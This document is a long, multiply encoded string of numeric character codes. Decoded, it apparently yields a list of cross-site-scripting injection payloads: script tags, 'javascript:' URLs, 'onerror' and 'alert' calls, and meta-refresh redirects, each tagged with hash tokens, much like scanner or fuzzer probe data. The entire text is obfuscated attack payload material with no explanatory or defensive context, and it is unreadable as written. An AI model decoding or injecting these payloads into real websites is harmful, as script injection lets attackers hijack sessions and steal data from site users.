53,50,67,49,49,54,37,50,53,50,67,49,48,49,37,50,53,50,67,49,49,48,37,50,53,50,67,49,49,54,37,50,53,50,67,54,49,37,50,53,50,67,51,52,37,50,53,50,67,56,53,37,50,53,50,67,56,51,37,50,53,50,67,54,57,37,50,53,50,67,56,50,37,50,53,50,67,55,51,37,50,53,50,67,54,56,37,50,53,50,67,54,49,37,50,53,50,67,51,56,37,50,53,50,67,49,48,56,37,50,53,50,67,49,49,54,37,50,53,50,67,53,57,37,50,53,50,67,56,51,37,50,53,50,67,54,55,37,50,53,50,67,56,50,37,50,53,50,67,55,51,37,50,53,50,67,56,48,37,50,53,50,67,56,52,37,50,53,50,67,51,56,37,50,53,50,67,49,48,51,37,50,53,50,67,49,49,54,37,50,53,50,67,53,57,37,50,53,50,67,52,57,37,50,53,50,67,53,50,37,50,53,50,67,57,56,37,50,53,50,67,53,52,37,50,53,50,67,53,51,37,50,53,50,67,53,50,37,50,53,50,67,49,48,50,37,50,53,50,67,52,56,37,50,53,50,67,53,55,37,50,53,50,67,57,56,37,50,53,50,67,53,48,37,50,53,50,67,49,48,49,37,50,53,50,67,57,57,37,50,53,50,67,53,54,37,50,53,50,67,49,48,50,37,50,53,50,67,49,48,48,37,50,53,50,67,53,49,37,50,53,50,67,53,48,37,50,53,50,67,53,54,37,50,53,50,67,53,51,37,50,53,50,67,52,57,37,50,53,50,67,53,51,37,50,53,50,67,53,54,37,50,53,50,67,49,48,48,37,50,53,50,67,53,49,37,50,53,50,67,52,57,37,50,53,50,67,49,48,48,37,50,53,50,67,53,49,37,50,53,50,67,53,55,37,50,53,50,67,57,56,37,50,53,50,67,53,55,37,50,53,50,67,53,52,37,50,53,50,67,51,56,37,50,53,50,67,49,48,56,37,50,53,50,67,49,49,54,37,50,53,50,67,53,57,37,50,53,50,67,52,55,37,50,53,50,67,56,51,37,50,53,50,67,54,55,37,50,53,50,67,56,50,37,50,53,50,67,55,51,37,50,53,50,67,56,48,37,50,53,50,67,56,52,37,50,53,50,67,51,56,37,50,53,50,67,49,48,51,37,50,53,50,67,49,49,54,37,50,53,50,67,53,57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1,37,50,53,50,67,54,55,37,50,53,50,67,56,50,37,50,53,50,67,55,51,37,50,53,50,67,56,48,37,50,53,50,67,56,52,37,50,53,50,67,51,50,37,50,53,50,67,56,51,37,50,53,50,67,56,50,37,50,53,50,67,54,55,37,50,53,50,67,54,49,37,50,53,50,67,49,48,52,37,50,53,50,67,49,49,54,37,50,53,50,67,49,49,54,37,50,53,50,67,49,49,50,37,50,53,50,67,53,56,37,50,53,50,67,52,55,37,50,53,50,67,52,55,37,50,53,50,67,52,57,37,50,53,50,67,53,48,37,50,53,50,67,53,53,37,50,53,50,67,52,54,37,50,53,50,67,52,56,37,50,53,50,67,52,54,37,50,53,50,67,52,56,37,50,53,50,67,52,54,37,50,53,50,67,52,57,37,50,53,50,67,54,50,37,50,53,50,67,53,52,37,50,53,50,67,57,55,37,50,53,50,67,53,51,37,50,53,50,67,53,55,37,50,53,50,67,57,56,37,50,53,50,67,53,50,37,50,53,50,67,53,51,37,50,53,50,67,57,57,37,50,53,50,67,53,53,37,50,53,50,67,57,57,37,50,53,50,67,53,52,37,50,53,50,67,53,49,37,50,53,50,67,53,52,37,50,53,50,67,53,51,37,50,53,50,67,57,57,37,50,53,50,67,53,51,37,50,53,50,67,49,48,49,37,50,53,50,67,57,55,37,50,53,50,67,49,48,48,37,50,53,50,67,53,48,37,50,53,50,67,49,48,49,37,50,53,50,67,49,48,49,37,50,53,50,67,53,49,37,50,53,50,67,53,55,37,50,53,50,67,53,51,37,50,53,50,67,53,55,37,50,53,50,67,52,56,37,50,53,50,67,49,48,48,37,50,53,50,67,57,57,37,50,53,50,67,49,48,50,37,50,53,50,67,52,57,37,50,53,50,67,53,50,37,50,53,50,67,54,48,37,50,53,50,67,52,55,37,50,53,50,67,56,51,37,50,53,50,67,54,55,37,50,53,50,67,56,50,37,50,53,50,67,55,51,37,50,53,50,67,56,48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1,52,37,50,53,50,67,51,56,37,50,53,50,67,52,57,37,50,53,50,67,53,50,37,50,53,50,67,53,57,37,50,53,50,67,49,48,54,37,50,53,50,67,57,55,37,50,53,50,67,49,49,56,37,50,53,50,67,57,55,37,50,53,50,67,49,49,53,37,50,53,50,67,57,57,37,50,53,50,67,49,49,52,37,50,53,50,67,49,48,53,37,50,53,50,67,49,49,50,37,50,53,50,67,49,49,54,37,50,53,50,67,53,56,37,50,53,50,67,53,50,37,50,53,50,67,53,54,37,50,53,50,67,49,48,48,37,50,53,50,67,57,57,37,50,53,50,67,52,57,37,50,53,50,67,53,50,37,50,53,50,67,53,48,37,50,53,50,67,49,48,50,37,50,53,50,67,49,48,48,37,50,53,50,67,53,50,37,50,53,50,67,57,55,37,50,53,50,67,53,54,37,50,53,50,67,53,50,37,50,53,50,67,53,54,37,50,53,50,67,57,57,37,50,53,50,67,53,54,37,50,53,50,67,49,48,49,37,50,53,50,67,49,48,48,37,50,53,50,67,53,51,37,50,53,50,67,53,51,37,50,53,50,67,49,48,49,37,50,53,50,67,53,48,37,50,53,50,67,53,54,37,50,53,50,67,52,56,37,50,53,50,67,49,48,50,37,50,53,50,67,52,56,37,50,53,50,67,57,57,37,50,53,50,67,57,55,37,50,53,50,67,53,54,37,50,53,50,67,53,48,37,50,53,50,67,57,57,37,50,53,50,67,49,48,48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1,52,37,50,53,50,67,49,48,54,37,50,53,50,67,57,55,37,50,53,50,67,49,49,56,37,50,53,50,67,51,56,37,50,53,50,67,51,53,37,50,53,50,67,49,50,48,37,50,53,50,67,52,56,37,50,53,50,67,54,56,37,50,53,50,67,53,57,37,50,53,50,67,57,55,37,50,53,50,67,49,49,53,37,50,53,50,67,57,57,37,50,53,50,67,49,49,52,37,50,53,50,67,49,48,53,37,50,53,50,67,49,49,50,37,50,53,50,67,49,49,54,37,50,53,50,67,53,56,37,50,53,50,67,53,53,37,50,53,50,67,52,57,37,50,53,50,67,49,48,49,37,50,53,50,67,49,48,48,37,50,53,50,67,53,53,37,50,53,50,67,52,57,37,50,53,50,67,53,48,37,50,53,50,67,52,57,37,50,53,50,67,57,57,37,50,53,50,67,53,54,37,50,53,50,67,53,49,37,50,53,50,67,49,48,49,37,50,53,50,67,53,55,37,50,53,50,67,53,53,37,50,53,50,67,53,50,37,50,53,50,67,52,57,37,50,53,50,67,52,56,37,50,53,50,67,53,53,37,50,53,50,67,52,56,37,50,53,50,67,57,55,37,50,53,50,67,53,53,37,50,53,50,67,57,55,37,50,53,50,67,53,55,37,50,53,50,67,53,50,37,50,53,50,67,49,48,49,37,50,53,50,67,53,48,37,50,53,50,67,49,48,50,37,50,53,50,67,53,55,37,50,53,50,67,57,56,37,50,53,50,67,52,56,37,50,53,50,67,53,48,37,50,53,50,67,52,56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2,53,37,50,53,50,67,52,53,37,50,53,50,67,52,53,37,50,53,50,67,51,50,37,50,53,50,67,54,48,37,50,53,50,67,55,51,37,50,53,50,67,55,55,37,50,53,50,67,55,49,37,50,53,50,67,51,50,37,50,53,50,67,56,51,37,50,53,50,67,56,50,37,50,53,50,67,54,55,37,50,53,50,67,54,49,37,50,53,50,67,51,52,37,50,53,50,67,51,50,37,50,53,50,67,51,56,37,50,53,50,67,51,53,37,50,53,50,67,52,57,37,50,53,50,67,53,50,37,50,53,50,67,53,57,37,50,53,50,67,51,50,37,50,53,50,67,51,50,37,50,53,50,67,49,48,49,37,50,53,50,67,53,54,37,50,53,50,67,49,48,50,37,50,53,50,67,53,49,37,50,53,50,67,53,50,37,50,53,50,67,57,57,37,50,53,50,67,57,55,37,50,53,50,67,53,51,37,50,53,50,67,57,56,37,50,53,50,67,57,55,37,50,53,50,67,57,57,37,50,53,50,67,53,49,37,50,53,50,67,53,51,37,50,53,50,67,57,56,37,50,53,50,67,49,48,48,37,50,53,50,67,53,50,37,50,53,50,67,57,55,37,50,53,50,67,53,54,37,50,53,50,67,49,48,49,37,50,53,50,67,53,48,37,50,53,50,67,57,56,37,50,53,50,67,57,55,37,50,53,50,67,53,51,37,50,53,50,67,53,51,37,50,53,50,67,53,53,37,50,53,50,67,52,57,37,50,53,50,67,49,48,50,37,50,53,50,67,52,57,37,50,53,50,67,57,57,37,50,53,50,67,53,48,37,50,53,50,67,53,54,37,50,53,50,67,53,52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2,53,37,50,53,50,67,52,53,37,50,53,50,67,52,53,37,50,53,50,67,51,50,37,50,53,50,67,54,48,37,50,53,50,67,55,51,37,50,53,50,67,55,55,37,50,53,50,67,55,49,37,50,53,50,67,51,50,37,50,53,50,67,56,51,37,50,53,50,67,56,50,37,50,53,50,67,54,55,37,50,53,50,67,54,49,37,50,53,50,67,51,52,37,50,53,50,67,53,49,37,50,53,50,67,57,57,37,50,53,50,67,52,57,37,50,53,50,67,53,50,37,50,53,50,67,53,55,37,50,53,50,67,52,56,37,50,53,50,67,49,48,50,37,50,53,50,67,53,51,37,50,53,50,67,57,55,37,50,53,50,67,53,52,37,50,53,50,67,53,51,37,50,53,50,67,49,48,49,37,50,53,50,67,49,48,48,37,50,53,50,67,57,55,37,50,53,50,67,57,55,37,50,53,50,67,49,48,48,37,50,53,50,67,53,50,37,50,53,50,67,53,54,37,50,53,50,67,57,55,37,50,53,50,67,57,57,37,50,53,50,67,49,48,48,37,50,53,50,67,53,54,37,50,53,50,67,53,53,37,50,53,50,67,53,53,37,50,53,50,67,52,56,37,50,53,50,67,49,48,49,37,50,53,50,67,53,55,37,50,53,50,67,53,55,37,50,53,50,67,49,48,49,37,50,53,50,67,49,48,50,37,50,53,50,67,53,55,37,50,53,50,67,49,48,50,37,50,53,50,67,51,5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1,37,50,53,50,67,54,55,37,50,53,50,67,56,50,37,50,53,50,67,55,51,37,50,53,50,67,56,48,37,50,53,50,67,56,52,37,50,53,50,67,54,50,37,50,53,50,67,57,55,37,50,53,50,67,54,49,37,50,53,50,67,52,55,37,50,53,50,67,53,51,37,50,53,50,67,53,52,37,50,53,50,67,49,48,50,37,50,53,50,67,52,57,37,50,53,50,67,53,51,37,50,53,50,67,57,57,37,50,53,50,67,53,49,37,50,53,50,67,57,55,37,50,53,50,67,53,49,37,50,53,50,67,49,48,50,37,50,53,50,67,53,53,37,50,53,50,67,57,57,37,50,53,50,67,57,57,37,50,53,50,67,57,57,37,50,53,50,67,57,57,37,50,53,50,67,53,48,37,50,53,50,67,53,54,37,50,53,50,67,57,56,37,50,53,50,67,49,48,48,37,50,53,50,67,53,48,37,50,53,50,67,53,51,37,50,53,50,67,52,57,37,50,53,50,67,49,48,50,37,50,53,50,67,52,56,37,50,53,50,67,53,51,37,50,53,50,67,49,48,48,37,50,53,50,67,53,52,37,50,53,50,67,53,51,37,50,53,50,67,57,55,37,50,53,50,67,57,56,37,50,53,50,67,57,57,37,50,53,50,67,53,53,37,50,53,50,67,52,55,37,50,53,50,67,57,55,37,50,53,50,67,49,48,56,37,50,53,50,67,49,48,49,37,50,53,50,67,49,49,52,37,50,53,50,67,49,49,54,37,50,53,50,67,52,48,37,50,53,50,67,57,55,37,50,53,50,67,52,54,37,50,53,50,67,49,49,53,37,50,53,50,67,49,49,49,37,50,53,50,67,49,49,55,37,50,53,50,67,49,49,52,37,50,53,50,67,57,57,37,50,53,50,67,49,48,49,37,50,53,50,67,52,49,37,50,53,50,67,54,48,37,50,53,50,67,52,55,37,50,53,50,67,56,51,37,50,53,50,67,54,55,37,50,53,50,67,56,50,37,50,53,50,67,55,51,37,50,53,50,67,56,48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2,53,37,50,53,50,67,52,53,37,50,53,50,67,52,53,37,50,53,50,67,51,50,37,50,53,50,67,51,52,37,50,53,50,67,53,57,37,50,53,50,67,49,48,49,37,50,53,50,67,52,57,37,50,53,50,67,53,53,37,50,53,50,67,53,54,37,50,53,50,67,53,51,37,50,53,50,67,53,55,37,50,53,50,67,53,49,37,50,53,50,67,52,57,37,50,53,50,67,52,57,37,50,53,50,67,53,50,37,50,53,50,67,57,57,37,50,53,50,67,49,48,49,37,50,53,50,67,53,52,37,50,53,50,67,52,57,37,50,53,50,67,53,55,37,50,53,50,67,49,48,50,37,50,53,50,67,52,56,37,50,53,50,67,53,48,37,50,53,50,67,49,48,49,37,50,53,50,67,53,55,37,50,53,50,67,53,53,37,50,53,50,67,49,48,50,37,50,53,50,67,53,53,37,50,53,50,67,52,57,37,50,53,50,67,52,57,37,50,53,50,67,52,56,37,50,53,50,67,53,51,37,50,53,50,67,53,50,37,50,53,50,67,53,49,37,50,53,50,67,49,48,50,37,50,53,50,67,53,50,37,50,53,50,67,49,48,50,37,50,53,50,67,53,57,37,50,53,50,67,52,55,37,50,53,50,67,52,55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49,49,49,37,50,53,50,67,51,52,37,50,53,50,67,49,49,52,37,50,53,50,67,49,48,49,37,50,53,50,67,49,48,50,37,50,53,50,67,49,49,52,37,50,53,50,67,49,48,49,37,50,53,50,67,49,49,53,37,50,53,50,67,49,48,52,37,50,53,50,67,51,52,37,50,53,50,67,51,50,37,50,53,50,67,54,55,37,50,53,50,67,55,57,37,50,53,50,67,55,56,37,50,53,50,67,56,52,37,50,53,50,67,54,57,37,50,53,50,67,55,56,37,50,53,50,67,56,52,37,50,53,50,67,54,49,37,50,53,50,67,51,52,37,50,53,50,67,52,56,37,50,53,50,67,53,57,37,50,53,50,67,51,50,37,50,53,50,67,56,53,37,50,53,50,67,56,50,37,50,53,50,67,55,54,37,50,53,50,67,54,49,37,50,53,50,67,49,48,52,37,50,53,50,67,49,49,54,37,50,53,50,67,49,49,54,37,50,53,50,67,49,49,50,37,50,53,50,67,53,56,37,50,53,50,67,52,55,37,50,53,50,67,52,55,37,50,53,50,67,53,57,37,50,53,50,67,56,53,37,50,53,50,67,56,50,37,50,53,50,67,55,54,37,50,53,50,67,54,49,37,50,53,50,67,49,48,50,37,50,53,50,67,53,51,37,50,53,50,67,57,55,37,50,53,50,67,57,57,37,50,53,50,67,53,50,37,50,53,50,67,52,56,37,50,53,50,67,53,50,37,50,53,50,67,49,48,50,37,50,53,50,67,57,57,37,50,53,50,67,53,55,37,50,53,50,67,57,56,37,50,53,50,67,53,49,37,50,53,50,67,49,48,49,37,50,53,50,67,49,48,50,37,50,53,50,67,52,57,37,50,53,50,67,53,49,37,50,53,50,67,53,49,37,50,53,50,67,53,52,37,50,53,50,67,57,55,37,50,53,50,67,53,54,37,50,53,50,67,53,52,37,50,53,50,67,53,53,37,50,53,50,67,53,55,37,50,53,50,67,53,48,37,50,53,50,67,53,53,37,50,53,50,67,53,55,37,50,53,50,67,57,56,37,50,53,50,67,53,54,37,50,53,50,67,49,48,50,37,50,53,50,67,49,48,48,37,50,53,50,67,49,48,48,37,50,53,50,67,53,48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1,37,50,53,50,67,54,55,37,50,53,50,67,56,50,37,50,53,50,67,55,51,37,50,53,50,67,56,48,37,50,53,50,67,56,52,37,50,53,50,67,51,50,37,50,53,50,67,54,48,37,50,53,50,67,54,54,37,50,53,50,67,54,50,37,50,53,50,67,54,49,37,50,53,50,67,49,48,48,37,50,53,50,67,52,57,37,50,53,50,67,53,52,37,50,53,50,67,53,54,37,50,53,50,67,53,48,37,50,53,50,67,49,48,50,37,50,53,50,67,53,53,37,50,53,50,67,53,49,37,50,53,50,67,52,57,37,50,53,50,67,57,55,37,50,53,50,67,49,48,50,37,50,53,50,67,53,48,37,50,53,50,67,57,56,37,50,53,50,67,49,48,50,37,50,53,50,67,57,56,37,50,53,50,67,49,48,48,37,50,53,50,67,53,48,37,50,53,50,67,53,51,37,50,53,50,67,53,49,37,50,53,50,67,53,53,37,50,53,50,67,53,49,37,50,53,50,67,57,57,37,50,53,50,67,53,53,37,50,53,50,67,57,56,37,50,53,50,67,53,53,37,50,53,50,67,52,56,37,50,53,50,67,53,53,37,50,53,50,67,53,52,37,50,53,50,67,53,54,37,50,53,50,67,53,54,37,50,53,50,67,53,51,37,50,53,50,67,53,52,37,50,53,50,67,51,52,37,50,53,50,67,54,50,37,50,53,50,67,54,48,37,50,53,50,67,52,55,37,50,53,50,67,56,51,37,50,53,50,67,54,55,37,50,53,50,67,56,50,37,50,53,50,67,55,51,37,50,53,50,67,56,48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48,37,50,53,50,67,56,50,37,50,53,50,67,54,53,37,50,53,50,67,55,55,37,50,53,50,67,54,57,37,50,53,50,67,51,50,37,50,53,50,67,56,51,37,50,53,50,67,56,50,37,50,53,50,67,54,55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49,48,48,37,50,53,50,67,49,48,48,37,50,53,50,67,53,52,37,50,53,50,67,53,54,37,50,53,50,67,53,51,37,50,53,50,67,52,57,37,50,53,50,67,53,54,37,50,53,50,67,52,57,37,50,53,50,67,57,56,37,50,53,50,67,53,49,37,50,53,50,67,53,52,37,50,53,50,67,53,55,37,50,53,50,67,53,51,37,50,53,50,67,53,52,37,50,53,50,67,53,55,37,50,53,50,67,53,54,37,50,53,50,67,53,49,37,50,53,50,67,53,52,37,50,53,50,67,57,55,37,50,53,50,67,57,55,37,50,53,50,67,49,48,49,37,50,53,50,67,53,54,37,50,53,50,67,49,48,50,37,50,53,50,67,57,55,37,50,53,50,67,57,56,37,50,53,50,67,53,50,37,50,53,50,67,53,55,37,50,53,50,67,53,54,37,50,53,50,67,53,49,37,50,53,50,67,53,50,37,50,53,50,67,53,49,37,50,53,50,67,57,57,37,50,53,50,67,51,50,37,50,53,50,67,54,48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1,37,50,53,50,67,54,55,37,50,53,50,67,56,50,37,50,53,50,67,55,51,37,50,53,50,67,56,48,37,50,53,50,67,56,52,37,50,53,50,67,54,50,37,50,53,50,67,57,55,37,50,53,50,67,54,49,37,50,53,50,67,52,55,37,50,53,50,67,49,48,49,37,50,53,50,67,53,51,37,50,53,50,67,53,50,37,50,53,50,67,49,48,50,37,50,53,50,67,53,51,37,50,53,50,67,53,49,37,50,53,50,67,53,54,37,50,53,50,67,53,51,37,50,53,50,67,53,49,37,50,53,50,67,53,55,37,50,53,50,67,57,57,37,50,53,50,67,53,54,37,50,53,50,67,49,48,50,37,50,53,50,67,53,55,37,50,53,50,67,53,51,37,50,53,50,67,53,50,37,50,53,50,67,57,57,37,50,53,50,67,53,49,37,50,53,50,67,49,48,49,37,50,53,50,67,53,52,37,50,53,50,67,57,55,37,50,53,50,67,52,57,37,50,53,50,67,49,48,48,37,50,53,50,67,57,56,37,50,53,50,67,53,53,37,50,53,50,67,49,48,49,37,50,53,50,67,52,57,37,50,53,50,67,53,50,37,50,53,50,67,49,48,48,37,50,53,50,67,53,54,37,50,53,50,67,53,54,37,50,53,50,67,53,53,37,50,53,50,67,52,55,37,50,53,50,67,49,49,48,37,50,53,50,67,49,48,49,37,50,53,50,67,53,51,37,50,53,50,67,53,50,37,50,53,50,67,49,48,50,37,50,53,50,67,53,51,37,50,53,50,67,53,49,37,50,53,50,67,53,54,37,50,53,50,67,53,51,37,50,53,50,67,53,49,37,50,53,50,67,53,55,37,50,53,50,67,57,57,37,50,53,50,67,53,54,37,50,53,50,67,49,48,50,37,50,53,50,67,53,55,37,50,53,50,67,53,51,37,50,53,50,67,53,50,37,50,53,50,67,57,57,37,50,53,50,67,53,49,37,50,53,50,67,49,48,49,37,50,53,50,67,53,52,37,50,53,50,67,57,55,37,50,53,50,67,52,57,37,50,53,50,67,49,48,48,37,50,53,50,67,57,56,37,50,53,50,67,53,53,37,50,53,50,67,49,48,49,37,50,53,50,67,52,57,37,50,53,50,67,53,50,37,50,53,50,67,49,48,48,37,50,53,50,67,53,54,37,50,53,50,67,53,54,37,50,53,50,67,53,53,37,50,53,50,67,54,48,37,50,53,50,67,52,55,37,50,53,50,67,56,51,37,50,53,50,67,54,55,37,50,53,50,67,56,50,37,50,53,50,67,55,51,37,50,53,50,67,56,48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4,37,50,53,50,67,54,53,37,50,53,50,67,56,57,37,50,53,50,67,54,57,37,50,53,50,67,56,50,37,50,53,50,67,51,50,37,50,53,50,67,56,51,37,50,53,50,67,56,50,37,50,53,50,67,54,55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3,48,37,50,53,50,67,52,56,37,50,53,50,67,49,48,48,37,50,53,50,67,53,54,37,50,53,50,67,53,55,37,50,53,50,67,53,53,37,50,53,50,67,53,50,37,50,53,50,67,52,56,37,50,53,50,67,57,56,37,50,53,50,67,49,48,50,37,50,53,50,67,49,48,48,37,50,53,50,67,53,52,37,50,53,50,67,57,57,37,50,53,50,67,49,48,49,37,50,53,50,67,53,55,37,50,53,50,67,57,56,37,50,53,50,67,53,50,37,50,53,50,67,49,48,49,37,50,53,50,67,53,55,37,50,53,50,67,53,48,37,50,53,50,67,49,48,49,37,50,53,50,67,53,53,37,50,53,50,67,53,51,37,50,53,50,67,57,55,37,50,53,50,67,53,55,37,50,53,50,67,53,48,37,50,53,50,67,49,48,48,37,50,53,50,67,52,56,37,50,53,50,67,52,57,37,50,53,50,67,57,56,37,50,53,50,67,53,49,37,50,53,50,67,57,57,37,50,53,50,67,54,50,37,50,53,50,67,54,48,37,50,53,50,67,52,55,37,50,53,50,67,55,54,37,50,53,50,67,54,53,37,50,53,50,67,56,57,37,50,53,50,67,54,57,37,50,53,50,67,56,50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1,37,50,53,50,67,56,52,37,50,53,50,67,56,57,37,50,53,50,67,55,54,37,50,53,50,67,54,57,37,50,53,50,67,54,50,37,50,53,50,67,49,48,56,37,50,53,50,67,49,48,53,37,50,53,50,67,51,50,37,50,53,50,67,49,50,51,37,50,53,50,67,49,48,56,37,50,53,50,67,49,48,53,37,50,53,50,67,49,49,53,37,50,53,50,67,49,49,54,37,50,53,50,67,52,53,37,50,53,50,67,49,49,53,37,50,53,50,67,49,49,54,37,50,53,50,67,49,50,49,37,50,53,50,67,49,48,56,37,50,53,50,67,49,48,49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1,52,37,50,53,50,67,57,56,37,50,53,50,67,53,52,37,50,53,50,67,57,57,37,50,53,50,67,53,55,37,50,53,50,67,49,48,49,37,50,53,50,67,53,48,37,50,53,50,67,53,52,37,50,53,50,67,53,52,37,50,53,50,67,52,56,37,50,53,50,67,57,56,37,50,53,50,67,57,57,37,50,53,50,67,53,55,37,50,53,50,67,53,51,37,50,53,50,67,53,52,37,50,53,50,67,53,52,37,50,53,50,67,53,50,37,50,53,50,67,52,56,37,50,53,50,67,52,57,37,50,53,50,67,57,56,37,50,53,50,67,57,56,37,50,53,50,67,52,56,37,50,53,50,67,52,57,37,50,53,50,67,52,57,37,50,53,50,67,52,57,37,50,53,50,67,57,55,37,50,53,50,67,57,55,37,50,53,50,67,57,55,37,50,53,50,67,53,50,37,50,53,50,67,49,48,49,37,50,53,50,67,53,50,37,50,53,50,67,53,55,37,50,53,50,67,53,53,37,50,53,50,67,54,48,37,50,53,50,67,52,55,37,50,53,50,67,56,51,37,50,53,50,67,56,52,37,50,53,50,67,56,57,37,50,53,50,67,55,54,37,50,53,50,67,54,57,37,50,53,50,67,54,50,37,50,53,50,67,54,48,37,50,53,50,67,56,53,37,50,53,50,67,55,54,37,50,53,50,67,54,50,37,50,53,50,67,54,48,37,50,53,50,67,55,54,37,50,53,50,67,55,51,37,50,53,50,67,54,50,37,50,53,50,67,57,56,37,50,53,50,67,53,52,37,50,53,50,67,57,57,37,50,53,50,67,53,55,37,50,53,50,67,49,48,49,37,50,53,50,67,53,48,37,50,53,50,67,53,52,37,50,53,50,67,53,52,37,50,53,50,67,52,56,37,50,53,50,67,57,56,37,50,53,50,67,57,57,37,50,53,50,67,53,55,37,50,53,50,67,53,51,37,50,53,50,67,53,52,37,50,53,50,67,53,52,37,50,53,50,67,53,50,37,50,53,50,67,52,56,37,50,53,50,67,52,57,37,50,53,50,67,57,56,37,50,53,50,67,57,56,37,50,53,50,67,52,56,37,50,53,50,67,52,57,37,50,53,50,67,52,57,37,50,53,50,67,52,57,37,50,53,50,67,57,55,37,50,53,50,67,57,55,37,50,53,50,67,57,55,37,50,53,50,67,53,50,37,50,53,50,67,49,48,49,37,50,53,50,67,53,50,37,50,53,50,67,53,55,37,50,53,50,67,53,53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1,56,37,50,53,50,67,51,53,37,50,53,50,67,52,57,37,50,53,50,67,53,57,37,50,53,50,67,49,48,54,37,50,53,50,67,57,55,37,50,53,50,67,49,49,56,37,50,53,50,67,57,55,37,50,53,50,67,49,49,53,37,50,53,50,67,57,57,37,50,53,50,67,49,49,52,37,50,53,50,67,49,48,53,37,50,53,50,67,49,49,50,37,50,53,50,67,49,49,54,37,50,53,50,67,53,56,37,50,53,50,67,53,48,37,50,53,50,67,57,57,37,50,53,50,67,57,56,37,50,53,50,67,53,50,37,50,53,50,67,53,48,37,50,53,50,67,57,55,37,50,53,50,67,49,48,48,37,50,53,50,67,53,51,37,50,53,50,67,53,48,37,50,53,50,67,53,51,37,50,53,50,67,52,56,37,50,53,50,67,53,55,37,50,53,50,67,53,55,37,50,53,50,67,53,50,37,50,53,50,67,53,53,37,50,53,50,67,52,56,37,50,53,50,67,49,48,48,37,50,53,50,67,57,56,37,50,53,50,67,57,55,37,50,53,50,67,53,51,37,50,53,50,67,53,54,37,50,53,50,67,53,55,37,50,53,50,67,53,55,37,50,53,50,67,53,52,37,50,53,50,67,53,54,37,50,53,50,67,53,54,37,50,53,50,67,57,56,37,50,53,50,67,57,55,37,50,53,50,67,53,53,37,50,53,50,67,53,48,37,50,53,50,67,53,54,37,50,53,50,67,53,51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0,37,50,53,50,67,54,57,37,50,53,50,67,54,53,37,50,53,50,67,54,56,37,50,53,50,67,54,50,37,50,53,50,67,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54,49,37,50,53,50,67,51,52,37,50,53,50,67,54,55,37,50,53,50,67,55,57,37,50,53,50,67,55,56,37,50,53,50,67,56,52,37,50,53,50,67,54,57,37,50,53,50,67,55,56,37,50,53,50,67,56,52,37,50,53,50,67,52,53,37,50,53,50,67,56,52,37,50,53,50,67,56,57,37,50,53,50,67,56,48,37,50,53,50,67,54,57,37,50,53,50,67,51,52,37,50,53,50,67,51,50,37,50,53,50,67,54,55,37,50,53,50,67,55,57,37,50,53,50,67,55,56,37,50,53,50,67,56,52,37,50,53,50,67,54,57,37,50,53,50,67,55,56,37,50,53,50,67,56,52,37,50,53,50,67,54,49,37,50,53,50,67,51,52,37,50,53,50,67,49,49,54,37,50,53,50,67,49,48,49,37,50,53,50,67,49,50,48,37,50,53,50,67,49,49,54,37,50,53,50,67,52,55,37,50,53,50,67,49,48,52,37,50,53,50,67,49,49,54,37,50,53,50,67,49,48,57,37,50,53,50,67,49,48,56,37,50,53,50,67,53,57,37,50,53,50,67,51,50,37,50,53,50,67,57,57,37,50,53,50,67,49,48,52,37,50,53,50,67,57,55,37,50,53,50,67,49,49,52,37,50,53,50,67,49,49,53,37,50,53,50,67,49,48,49,37,50,53,50,67,49,49,54,37,50,53,50,67,54,49,37,50,53,50,67,56,53,37,50,53,50,67,56,52,37,50,53,50,67,55,48,37,50,53,50,67,52,53,37,50,53,50,67,53,53,37,50,53,50,67,51,52,37,50,53,50,67,54,50,37,50,53,50,67,54,48,37,50,53,50,67,52,55,37,50,53,50,67,55,50,37,50,53,50,67,54,57,37,50,53,50,67,54,53,37,50,53,50,67,54,56,37,50,53,50,67,54,50,37,50,53,50,67,52,51,37,50,53,50,67,54,53,37,50,53,50,67,54,56,37,50,53,50,67,49,49,57,37,50,53,50,67,52,53,37,50,53,50,67,56,51,37,50,53,50,67,54,55,37,50,53,50,67,56,50,37,50,53,50,67,55,51,37,50,53,50,67,56,48,37,50,53,50,67,56,52,37,50,53,50,67,52,51,37,50,53,50,67,54,53,37,50,53,50,67,54,56,37,50,53,50,67,53,50,37,50,53,50,67,52,53,37,50,53,50,67,52,57,37,50,53,50,67,53,54,37,50,53,50,67,49,48,48,37,50,53,50,67,53,54,37,50,53,50,67,57,56,37,50,53,50,67,53,53,37,50,53,50,67,53,51,37,50,53,50,67,49,48,50,37,50,53,50,67,57,55,37,50,53,50,67,53,48,37,50,53,50,67,53,55,37,50,53,50,67,57,55,37,50,53,50,67,53,49,37,50,53,50,67,53,53,37,50,53,50,67,57,56,37,50,53,50,67,53,48,37,50,53,50,67,53,54,37,50,53,50,67,53,48,37,50,53,50,67,53,49,37,50,53,50,67,52,56,37,50,53,50,67,53,53,37,50,53,50,67,57,56,37,50,53,50,67,57,56,37,50,53,50,67,53,54,37,50,53,50,67,49,48,48,37,50,53,50,67,49,48,50,37,50,53,50,67,52,56,37,50,53,50,67,53,49,37,50,53,50,67,52,56,37,50,53,50,67,49,48,48,37,50,53,50,67,57,56,37,50,53,50,67,53,54,37,50,53,50,67,52,51,37,50,53,50,67,54,53,37,50,53,50,67,54,56,37,50,53,50,67,49,49,57,37,50,53,50,67,52,53,37,50,53,50,67,52,55,37,50,53,50,67,56,51,37,50,53,50,67,54,55,37,50,53,50,67,56,50,37,50,53,50,67,55,51,37,50,53,50,67,56,48,37,50,53,50,67,56,52,37,50,53,50,67,52,51,37,50,53,50,67,54,53,37,50,53,50,67,54,56,37,50,53,50,67,53,50,37,50,53,50,67,52,53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7,55,37,50,53,50,67,51,50,37,50,53,50,67,49,48,52,37,50,53,50,67,49,49,52,37,50,53,50,67,49,48,49,37,50,53,50,67,49,48,50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1,53,37,50,53,50,67,57,55,37,50,53,50,67,52,57,37,50,53,50,67,53,48,37,50,53,50,67,53,54,37,50,53,50,67,53,50,37,50,53,50,67,53,55,37,50,53,50,67,57,56,37,50,53,50,67,49,48,48,37,50,53,50,67,53,55,37,50,53,50,67,53,50,37,50,53,50,67,53,51,37,50,53,50,67,53,49,37,50,53,50,67,57,57,37,50,53,50,67,53,50,37,50,53,50,67,53,51,37,50,53,50,67,52,57,37,50,53,50,67,53,53,37,50,53,50,67,53,50,37,50,53,50,67,57,55,37,50,53,50,67,49,48,48,37,50,53,50,67,53,52,37,50,53,50,67,53,52,37,50,53,50,67,57,57,37,50,53,50,67,57,55,37,50,53,50,67,53,49,37,50,53,50,67,53,48,37,50,53,50,67,53,54,37,50,53,50,67,57,56,37,50,53,50,67,49,48,48,37,50,53,50,67,49,48,49,37,50,53,50,67,49,48,49,37,50,53,50,67,53,48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9,4